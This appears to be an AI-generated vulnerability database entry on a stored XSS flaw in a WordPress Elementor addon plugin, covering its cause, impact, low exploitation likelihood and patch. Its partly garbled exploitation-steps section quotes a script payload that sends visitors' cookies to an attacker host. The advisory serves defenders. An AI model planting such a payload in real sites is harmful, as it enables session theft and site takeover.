
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0664 is a Stored Cross-Site Scripting (XSS) vulnerability in the Royal Addons for Elementor plugin for WordPress, affecting all versions up to and including 1.7.1049. The flaw exists in the button_text parameter due to insufficient input sanitization and output escaping, allowing authenticated attackers with contributor-level access or above to inject persistent malicious scripts. It was published on April 4, 2026, with a patch available in version 1.7.1050. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant. The button_text parameter in the plugin's form builder widget (wpr-form-builder.php) fails to properly sanitize user-supplied input before storing it and escape it before rendering it in page output. An authenticated attacker with at minimum contributor-level WordPress access can submit a crafted payload via this parameter, which is then persistently stored and executed in the browser of any user who visits the affected page. The fix was introduced in version 1.7.1050, as evidenced by changes in the plugin's Trac repository (GitHub Advisory, Wordfence).
Successful exploitation allows an authenticated contributor to inject arbitrary JavaScript that executes in the context of any site visitor's browser, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, redirection to malicious sites). Because the injected script persists in the database and fires for all users visiting the affected page, the blast radius extends to all site visitors including administrators, potentially enabling privilege escalation or full site takeover. Availability is not directly impacted by this vulnerability (GitHub Advisory, Wordfence).
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of publication (GitHub Advisory). The EPSS score is approximately 0.01% (2nd percentile), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum a contributor-level WordPress account, which limits opportunistic mass exploitation but remains a realistic threat in multi-author or open-registration WordPress environments.
button_text parameter field, enter a crafted XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.button_text field of Royal Addons form builder widget data within the WordPress wp_posts or wp_postmeta tables.wp-content/plugins/royal-elementor-addons/ for unauthorized modifications.Update the Royal Addons for Elementor plugin to version 1.7.1050 or later, which contains the fix for improper output escaping in the button_text parameter (GitHub Advisory, Wordfence). As an interim measure, restrict contributor-level access to trusted users only and audit existing pages for suspicious content in form builder widgets. A Web Application Firewall (WAF) with XSS filtering rules can provide additional defense-in-depth while patching is pending.
Sucuri included CVE-2026-0664 in their April 2026 vulnerability patch roundup, highlighting it as part of broader WordPress plugin security concerns (Sucuri Blog). The vulnerability was assigned and disclosed by Wordfence, which maintains a dedicated threat intelligence entry for it. No significant broader media coverage or notable researcher commentary beyond standard vulnerability aggregation was identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."